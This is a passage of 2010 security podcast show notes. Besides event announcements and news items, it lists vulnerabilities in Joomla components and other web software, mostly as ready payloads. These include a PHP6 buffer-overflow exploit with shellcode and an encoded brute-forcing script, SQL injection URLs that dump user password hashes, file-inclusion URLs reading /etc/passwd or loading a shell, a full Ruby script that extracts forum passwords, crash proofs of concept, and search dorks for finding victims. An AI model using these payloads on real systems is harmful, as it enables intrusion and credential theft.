   “\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189″.
   “\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0″.
   “\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a”.
   “\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c”.
   “\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155″.
   “\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0″.
   “\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344″;

   $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
   str_transliterate(0, $exploit, 0);
   } else {
   exit(“Error! ‘unicode.semantics’ has be on!\r\n”);
   }

   function ini_get_bool($a) {
   $b = ini_get($a);
   switch (strtolower($b)) {
   case ‘on’:
   case ‘yes’:
   case ‘true’:
   return ‘assert.active’ !== $a;
   case ‘stdout’:
   case ‘stderr’:
   return ‘display_errors’ === $a;
   default:
   return (bool) (int) $b;
   }
   }

   /*
   IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt
   cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91
   dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg
   ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g
   c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw
   YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw
   LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6
   IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp
   biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp
   CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh
   cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp
   Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms
   IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k
   Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu
   dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy
   aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9
   PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg
   fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ
   cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y
   ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy
   ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg
   ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg
   Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt
   ZS5zbGVlcCgwLjA1KSAK
   */
   ?>

5. Joomla Component QPersonel is subject to a SQL Injection vulnerability. Version older than 1.02 are impacted, though others may be as well.  Google Dork “inurl:option=com_qpersonel”.  Example URL is available:  http://www.sample.com/index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(database(),user())–
6. VMware Remote Console is subject to a format string vulnerability. Version 4.0 impacted, though others may be as well.  Example code is available:
   Create a shortcut: C:\Program Files\Common Files\VMware\VMware Remote Console Plug-in>vmware-vmrc.exe -u vmware_user -h HOST -M AAAA:%x.%x.%x.%x.:BBBB

   VMDlg::ShowDialog: Error opening the remote virtual machine
   HOST\AAAA:3455600.78138a94.100012b2.28e27b0.:BBBB:

   Example(ActiveX): objectVMRC.connect (“host” ,”username” ,”password”,
   “%x:%x:%x:%x:%x:%x:%x:%x:%x” ,”X” ,2);

7. Magneto Software ActiveX Control is subject to a ICMP Crash Denial of Service vulnerability. Example code is available:
   <html>
   <object classid=’clsid:B5ED1577-4576-11D5-851F-00D0B7A934F6′ id=’target’ /></object>
   <script language=’vbscript’>
   ‘Magneto Software ActiveX Control ICMP Crash POC
   ‘Discovered by:  s4squatch
   ‘Site:  www.securestate.com
   ‘Date Discovered: 02/11/10
   ‘Vendor Notified: 02/02/10 –> NO RESPONSE
   ‘Vendor Notified: 02/11/10 –> NO RESPONSE
   ‘Vendor Notified: 02/17/10 –> NO RESPONSE
   ‘Published 04/13/10
   ‘www:  http://www.magnetosoft.com/products/skdns/skdns_features.htm
   ‘Download:  http://www.magnetosoft.com/downloads/skdns_setup.exe
   ‘SKNetResource.ocx
   ‘Function DNSLookupHostWithServer ( ByVal strHostName As String ,  ByVal strNameServer As String ) As Long
   ‘progid = “SKDNSLib.SKDns”

   arg1 = “%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n”
   arg2 = “defaultV”
   target.DNSLookupHostWithServer arg1 ,arg2

   </script>

Stories of Interest:News item 1:  http://www.darkreading.com/vulnerability_management/security/management/showArticle.jhtml?articleID=224400589Conducting penetration testing in-house rather than using an outside consultant is worth considering for reasons of both cost and security expertise — but it’s also a step not to be taken lightly.”The advantage of having in-house penetration testers is the focus they provide,” says Chris Nickerson, founder of security firm Lares Consulting. “They’re able to keep track of the latest exploits and vulnerabilities, constantly monitor systems, and practice and sharpen their skills. But in order to achieve those benefits, they have to be focused. “Nickerson points out that while some really large enterprises are fielding teams wholly dedicated to testing, for most companies pen tests are only part of the testers’ responsibilities. “It’s all too common to find penetration tests delayed or put off because the tester has too many other open tickets to deal with,” he says.While even a part-time pen-test specialist on staff can be a step in the right direction, it can also be risky. “The variety of tools available for pen tests today is remarkable, and I pretty much applaud them all,” he says. “Metasploit, Canvas, Core, Nessus, and others have spent a lot of time ensuring that installing their agents don’t blow the boxes that are being tested. That’s the default: Once the agent is installed and it’s determined whether or not the exploit works, the agent is uninstalled.”

InfoSec Daily Podcast

 
ISD Podcast Episode 114 for April 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo  April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. MKPortal Contact module is subject to Cross Site Scripting (XSS) vulnerability. Example URLs are available: http://www.sample.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E

   http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E

   http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E

2. Joomla Component com_jp_jobs is subject to SQL Injection vulnerability. Version 1.2.0 is impacted, though others may be as well. Google Dork “inurl:option=com_jp_jobs”.  Example URL is available: http://www.sample.com/index.php?option=com_jp_jobs&view=detail&id=-999999/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users–
3. Blog System is subject to a Local File Inclusion (LFI) vulnerability. Versions older than 1.5 are impacted, though others may be as well. Google Dorks “inurl:category=home”, “inurl:category=comments”, “inurl:category=lists”, “inurl:category=habillage” and “inurl:category=info”.  Example URLs are available: http://www.sample.com/ADMIN/index.php?category=home&action=../../../../../../../../etc/passwd%00

   http://www.sample.com/ADMIN/index.php?category=comments&action=../../../../../../../../etc/passwd%00

   http://www.sample.com/ADMIN/index.php?category=lists&action=../../../../../../../../etc/passwd%00

   http://www.sample.com/ADMIN/index.php?category=habillage&action=../../../../../../../../etc/passwd%00

   http://www.sample.com/ADMIN/index.php?category=info&action=../../../../../../../../etc/passwd%00

4. Vieassociative Openmairie is subject to (RFI/LFI) Multiple File Include vulnerabilities. Version 1.01 beta is impacted, though others may be as well.  Example URLs are available: http://www.sample.com/[path]/gen/obj/association.class.php??path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/collectivite.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/planning.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/rubrique.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/assurance.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/cotisation.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/profil.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/utilisateur.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/bureau.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/droit.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/aquartier.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/categorie.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/fonction.class.php?path_om=[Shell]

   http://www.sample.com/[path]/gen/obj/ressource.class.php?path_om=[Shell]

   http://www.sample.com/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]

5. 60cycleCMS (DOCUMENT_ROOT) is subject to a Local File Inclusion (LFI) vulnerability. Version 2.5.2 is impacted, though others may be as well. Example URLs are available: http://www.sample.com/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00
   http://www.sample.com/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00
   http://www.sample.com/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00
6. Joomla Component Jvehicles is subject to a SQL Injection vulnerability. Versions 1.0 and 2.0 are impacted, though others may be as well. Google Dork “inurl:option=com_jvehicles”.  Example URL is available: http://www.sample.com/index.php?option=com_jvehicles&task=agentlisting&aid=31337
7. Openurgence vaccin is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.03 is impacted, though others may be as well. Example URLs are available: http://www.sample.com/gen/obj/collectivite.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/injection.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/utilisateur.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/droit.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/laboratoire.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/vaccin.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/effetsecondaire.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/medecin.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/individu.class.php?path_om=[Shell]

   http://www.sample.com/gen/obj/profil.class.php?path_om=[Shell]

   http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00

8. Police Municipale Open Main Courante is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.01beta is impacted, though others may be as well. Example URLs are available: http://www.sample.com/gen/obj/affectation.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/categorie.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/maincourante.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/planning.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/utilisateur.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/affectationportable.class.phpp?path_om[Shell]

   http://www.sample.com/gen/obj/collectivite.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/mission.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/portable.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/vehicule.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/affectationvehicule.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/droit.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/nature.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/profil.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/agent.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/intervention.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/periode.class.php?path_om[Shell]

   http://www.sample.com/gen/obj/urgence.class.php?path_om[Shell]

   http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00

9. joelz bulletin board is subject to a SQL Injection vulnerability. Version older than 0.9.9rc3 are impacted, though others may be as well. Exploit code is available:
   #!/usr/bin/ruby
   #4004-security-project.com
   #Discovered and vulnerability by Easy Laster
   require ‘net/http’
   print “\nEnter host name (site.com)->”
   host=gets.chomp
   print “\nEnter script path (/forum/)->”
   path=gets.chomp
   print “\nEnter script path (userid)->”
   userid=gets.chomp
   begin
   dir = “showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0×23,0×23,0×23,0×23,0×23,username,0×23,0×23,0×23,0×23,0×23),8+from+user+where+erstellerid=”+ userid +”–”
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print “\nid -> “+(/#####(.+)#####/).match(resp.body)[1]
   dir = “showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0×23,0×23,0×23,0×23,0×23,passwort,0×23,0×23,0×23,0×23,0×23),8+from+user+where+erstellerid=”+ userid +”–”
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print “\npassword -> “+(/#####(.+)#####/).match(resp.body)[1]
   dir = “showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0×23,0×23,0×23,0×23,0×23,email,0×23,0×23,0×23,0×23,0×23),8+from+user+where+erstellerid=”+ userid +”–”
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print “\nEmail -> “+(/#####(.+)#####/).match(resp.body)[1]
   print “\n#########################################################”
   rescue
   print “\nExploit failed”
   end

Stories of Interest:
News item 1:  http://www.memphisdailynews.com/editorial/Article.aspx?id=49432

David Kernell, a 22-year-old student at the University of Tennessee, is accused of accessing Sarah Palin’s Yahoo! email account by answering her security question and re-setting her password.  Then posting screenshots of the hacked accounted included Bristol Palin’s phone number.  Bristol Palin, the daughter of former Alaska governor Sarah Palin, testified in a Knoxville, Tenn., court Wednesday that the hacking of her mother’s personal email account led to her being pestered by anonymous phone calls

Kernell was apparently asked what he thought of Bristol Palin and replied, “Not my type.”  Convictions on all four felony charges – identity theft, wire fraud, intentionally accessing Palin’s e-mail account without authorization and obstructing an FBI investigation – could send Kernell to prison for up to 50 years.
News item 2:http://www.zdnet.co.uk/news/security-threats/2010/04/16/security-researchers-demo-cisco-wi-fi-flaws-40088653/
Two generations of Cisco wireless LAN equipment contain a range of vulnerabilities, researchers have told the Black Hat security conference.

Enno Rey and Daniel Mende from German testing firm ERNW demonstrated how to hack into two separate generations of Cisco Wi-Fi kit. They said that the flaws were fairly easy to find and exploit.

In a presentation called ‘Hacking Cisco Enterprise WLANs’ on Wednesday, the researchers demonstrated an attack aimed at Cisco’s first generation equipment Cisco Structured Wireless Aware Network (Swan).  The researchers said it was possible to launch denial of service attacks and to sniff encrypted traffic on Swan by exploiting weaknesses in Cisco’s Wireless LAN Context Control Protocol (WLCCP). The protocol defines how information is sent between wireless access points.  Swan access points transfer keys between them to facilitate roaming. Rey said that Leap – the authentication protocol used in Cisco’s equipment – was weak, meaning that the cryptography used to hide the keys could be broken.

News item 3: http://vil.nai.com/vil/5958_false.htm
McAfee identified a new threat that impacts Windows PCs. Researchers worked diligently to address this threat that attacks critical Windows system executables and buries itself deep into a computer’s memory.  The McAfee research team created detection and removal to address this threat. The remediation passed our quality testing and was released with the 5958 virus definition file at 2:00 PM GMT+1 (6am Pacific Time) on Wednesday, April 21.”

Not long after that, reports began to surface that Windows PC’s–primarily Windows XP SP3 PC’s–were experiencing significant issues, including constant rebooting or the ever-popular BSOD (blue screen of death) system crash.

A number of customers experienced a false positive resulting in the ensuing chaos. The 5958 virus definitions apparently detect svchost.exe–a core system file on Windows PC’s–as a malware threat. According to the McAfee statement, though, “corporations who kept a feature called “Scan Processes on Enable” in McAfee VirusScan Enterprise disabled, as it is by default, were not affected.”

McAfee responded by quickly pulling the faulty update from the McAfee servers. An emergency extra.dat file was made available in the McAfee forums to address the issue, but the forums site was so overwhelmed with customer backlash that it was eventually taken offline. A corrected virus definition file–5959–is now available, and McAfee has posted instructions to recover affected systems.

InfoSec Daily Podcast

 
ISD Podcast Episode 113 for April 21, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th – Still seats available.
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com.  We are working with Scott on establishing a  real discount code and should have one by next week.

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo  April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Interview:
Tonight we have a special Guest John Smith.  John is the creator of XEN-trifuge and edgesightunderthehood.com

Welcome to our podcast John.

InfoSec Daily Podcast

 
ISD Podcast Episode 112 for April 20, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo  April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. Joomla Component Web TV is subject to a Local File Inclusion (LFI) vulnerability.  Google Dork “inurl:option=com_webtv“.  Example URL is available:

   http://www.sample.com/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00

2. Joomla Component Horoscope is subject to a Local File Inclusion (LFI) vulnerability.  Google Dork “inurl:option=com_horoscope“.  Example URL is available:

   http://www.sample.com/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00

3. Joomla Component Arcade Games is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.0 is impacted, though others may be as well. Google Dork “inurl:option=com_arcadegames“.  Example URL is available:

   http://www.sample.com/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00

4. Joomla Component FlashGames is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_flashgames“.  Example URL is available:

   http://www.sample.com/index.php?option=com_flashgames&controller=../../../../../../../../../../etc/passwd%00

5. Joomla Component AddressBook is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_addressbook“.  Example URL is available:

   http://www.sample.com/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00

6. Joomla Component Easy Ad Banner is subject to a Local File Inclusion (LFI) vulnerability.  Version 0.25 is impacted, though others may be as well. Google Dork “inurl:option=com_advertising“.  Example URL is available:

   http://www.sample.com/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00

7. Joomla Component CV Maker is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.0 is impacted, though others may be as well. Google Dork “inurl:option=com_cvmaker“.  Example URL is available:

   http://www.sample.com/index.php?option=com_cvmaker&controller=../../../../../../../../../../etc/passwd%00

8. Joomla Component My Files is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.0 is impacted, though others may be as well. Google Dork “inurl:option=com_myfiles“.  Example URL is available:

   http://www.sample.com/index.php?option=com_myfiles&controller=../../../../../../../../../../etc/passwd%00

9. Joomla Component Online Exam is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_onlineexam“.  Example URL is available:

   http://www.sample.com/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00

10. Joomla Component JoomMail is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_joommail“.  Example URL is available:

    http://www.sample.com/index.php?option=com_joommail&controller=../../../../../../../../../../etc/passwd%00

11. Joomla Component Memory Book is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.2 is impacted, though others may be as well. Google Dork “inurl:option=com_memory“.  Example URL is available:

    http://www.sample.com/index.php?option=com_memory&controller=../../../../../../../../../../etc/passwd%00

12. Joomla Component Online Market is subject to a Local File Inclusion (LFI) vulnerability.  Version 2.x is impacted, though others may be as well. Google Dork “inurl:option=com_market“.  Example URL is available:

    http://www.sample.com/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00

13. Joomla Component Digital Diary is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_diary“.  Example URL is available:

    http://www.sample.com/index.php?option=com_diary&controller=../../../../../../../../../../etc/passwd%00

14. Joomla Component World Rates is subject to a Local File Inclusion (LFI) vulnerability. Google Dork “inurl:option=com_worldrates“.  Example URL is available:

    http://www.sample.com/index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00

15. Joomla Component Record is subject to a Local File Inclusion (LFI) vulnerability. Google Dork “inurl:option=com_record“.  Example URL is available:

    http://www.sample.com/index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00

16. Joomla Component Sweetykeeper is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.x is impacted, though others may be as well. Google Dork “inurl:option=com_sweetykeeper“.  Example URL is available:

    http://www.sample.com/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00

17. Joomla Component FLEXIcontent is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5 stable is impacted, though others may be as well. Google Dork “inurl:option=com_flexicontent“.  Example URL is available:

    http://www.sample.com/index.php?option=com_flexicontent&controller=../../../../../../../../../../etc/passwd%00

18. Joomla Component com_jdrugstopics is subject to a SQL Injection vulnerability.  Google Dork “inurl:option=com_jdrugstopics“.  Example URL is available:

    http://www.sample.com/index.php?option=com_jdrugstopics&view=drugsdetails&id=

    -226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users–

19. Joomla Component Serman Speaker is subject to a SQL Injection vulnerability.  Google Dork “inurl:option=com_sermonspeaker“.  Example URL is available:

    http://www.sample.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=

    -9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

20. FusionForge is subject to a Remote File Inclusion (RFI) vulnerability.  Version 5.0 is impacted, though others may be as well. 283 example URLs are available:

    http://www.sample.com/[path]/common/docman/Document.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/docman/DocumentFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/docman/DocumentGroup.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/forum/Forum.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/forum/ForumsForUser.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/forum/ForumFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/forum/ForumMessage.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/forum/ForumMessageFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/frs/FRSFile.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/frs/FRSPackage.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/frs/FRSRelease.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/MailParser.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/SCMPlugin.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/FusionForge.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/GroupJoinRequest.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/Permission.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/Role.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/session.php?gfcommon=[Shell]

